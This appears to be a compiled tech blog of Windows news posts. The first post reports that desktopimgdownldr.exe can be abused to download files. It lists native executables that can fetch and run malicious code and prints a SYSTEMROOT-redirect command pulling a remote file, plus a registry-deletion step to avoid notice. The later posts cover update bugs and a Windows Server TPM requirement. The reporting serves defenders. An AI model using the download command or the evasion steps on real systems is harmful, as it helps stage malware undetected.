Windows 10 Background image tool… Cause a Security issues

A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.

Known as living-off-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.

The new LoL in the Bin
An attacker can use LoLBins to download and install malware, bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.

A list of 13 Windows native executables that can download and execute malicious code:

powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe

The executable is part of the Personalization CSP (configuration service provider) that allows, among others, defining the lock screen and desktop background images.

In both cases, the setting accepts JPG, JPEG, PNG files that are stored locally or remotely (supports HTTP/S URLs).

Running desktopimgdownldr.exe with administrator privileges overrules the user-defined lock screen image, alerting of something suspicious.

This can be avoided, though, if the attacker deletes a registry value immediately after running executing the binary, leaving the user none the wiser.

Executable appears to require high privileges (admin) so that it can create files in C:\Windows and in the registry, it can also run as a standard user to download files from an external source.

This is possible by changing the location of the %systemroot% environment variable before executing the binary. This results in modifying the download destination and bypassing access checks.

set “SYSTEMROOT=C:\Windows\Temp” && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Without administrator rights, writing to the registry is not possible, so the lock screen image remains unchanged. In this scenario, the method creates no other artifacts than the downloaded file.

Executable uses BITS COM Object to download a file and on some machines it tries to locate the COM+ Registration Catalog in the %systemroot% location. Since the attacker changes the environment variable, the attempt fails.

Users of Endpoint Detection and Response solutions to add “desktopimgdownldr.exe” to their queries and watchlists and treat it just like “certutil.exe,” a widely used LoLBin, by both advanced hackers doing a government’s bidding and cybercriminals set on scoring big money.

Windows 10 2004 … Its again erroneous

It’s been exactly a month Windos 10 2004 released. It has cool features but still it’s erroneous a bit… Struggling a little to cop up ..

Windows 10 version 2004, which was released on May 27, is currently available for seekers or those who manually check for updates in Windows Updates settings.

In addition to new features, Windows 10 version 2004 (May 2020 Update) also comes with improvements to block potentially unwanted programs, also known short PUPs and PUAs, from showing up on your system or being installed on Windows PCs.

Windows 10 May 2020 Update allows you to maintain a track of the potentially unwanted programs and prevent from being downloaded or installed on Windows 10 systems.

The Potentially Unwanted Programs or Potential Unwanted Programs come included in various types of software bundling and driver or registry optimizer.

After applying May 2020 Update, users are reporting that Windows Security app triggers security threat alerts even when the PUA file is gone. After the PUA has been removed or allowed to run on Windows 10, later scans of Windows Security are detecting the old items again, causing an erroneous detection loop.

It appears that Windows Defender has been defaulted to identify PUPs as a threat in Windows 10 version 2004. After the PUP has been removed, Windows Defender identities the same file again and again as a threat on the subsequent scans of the history.

To fix PUP and PUA warnings in Windows Security app, you would need to delete PUPs history information by following these steps:

• Open File Explorer.
• Navigate to C:ProgramData–> Microsoft–>Windows Defender–>ScansHistory Service
• In the Service folder, delete PUP related files.
• Restart Windows and do a quick scan in Windows Security app.


The notifications for PUPs won’t show up again until another PUP file is loaded on your system.

It’s not yet clear whether Microsoft is aware of the reports, but a fix could be planned as the issue has been widely reported by affected users on Microsoft’s answers forum.

The post Windows 10 version 2004 bug triggers repeated security alerts appeared first on Windows Latest

Windows Server requires TPM. New norm to be soon


Windows Server to require TPM2.0 and Secure boot by default in future release
Jan 1, 2021 deadline for server-makers to get with the program

Microsoft has announced that the next “major release” of Windows Server will require TPM 2.0 and Secure Boot installed and enabled by default.

“These requirements apply to servers where Windows Server will run, including bare metal, virtual machines (guests) running on Hyper-V or on third party hypervisors approved through the Server Virtualization Validation Program (SVVP),” writes Microsoft’s Windows Server Team.

“Looking ahead, Secure boot and TPM2.0 will serve as the core building blocks for Windows Server security and provide customers with strengthened baseline security for systems available from the ecosystem,” Microsoft’s post adds. “The enforcement of these requirements will be applied to new server platforms introduced to market after January 1, 2021.”

It’s hard to argue against the change because Secure boot is a more-than-useful way of ensuring that servers boot into know and trusted environments. TPM2.0 has been all-but-standard since 2016 for PCs. Making it a requirement for the sensitive jobs Windows Server is asked to undertake ought not to be controversial.

There is, of course, some pain in this announcement because it will limit upgrade paths for some users.

But Microsoft appears to know this as its post says: “Existing server platforms will include Additional Qualification certification to help customers identify systems that meet these requirements, similar to the current Assurance AQ for Windows Server 2019 today.”

Windows 10 2004 OS update issues

The Windows 10 May 2020 update was released about a week ago but only to a select group of laptops that aren’t affected by known bugs. Everyone else will encounter a notification informing them that they can’t upgrade their system to Windows 10 version 2004.

This restriction also applies to users whose laptops and desktops use Intel Optane memory, a module that caches your most used programs, videos and docs so you can quickly access them. While laptops with Optane won’t automatically update to the latest Windows version, several users have forced the update through the Media Creation Tool and are now complaining about a compatibility error.

“Unable to load DLL ‘iaStorAfsServiceApi.dll’: The specified module could not be found. (Exception from HRESULT: 0x8),” the message reads.

During the update process, Windows 10 removes an Optane Memory Pinning file from the device, which leads to problems when it tries to run it. As Windows Latest points out, testers uncovered the compatibility issue months ago and reported it in the Feedback Hub.

“This is a problem because Optane Memory Pinnings should have been moved to the new update, but the files were not, but it is still in the Windows Installer Database. I am unable to remove it because the files and uninstallers themselves are gone and now Windows tries to launch a program with .dlls that do not exist,” one person wrote.

It’s possible the complaint sneaked past Microsoft or the company was busy trying to fix other widespread issues that it didn’t have time to tackle the Optane problem. Whatever the case, users who own laptops with Optane memory should wait for Microsoft to patch the compatibility bug before downloading the May 2020 Update.

How to Proceed

If you’ve manually forced the update onto your machine and are experiencing problems — related to Optane or otherwise — your best bet is to revert to an earlier version of the operating system.

To do so, search “Update” in Windows Search and choose “Check for Updates.” Select “Update History” toward the button of the screen then “Uninstall updates.” From this page, find Windows 10 version 2004.

You can also try disabling Optane memory from the device manager. Go to the Control Panel and find Programs and Features. From here, right-click Intel Optane Pinning Explorer Extensions and choose “Uninstall.”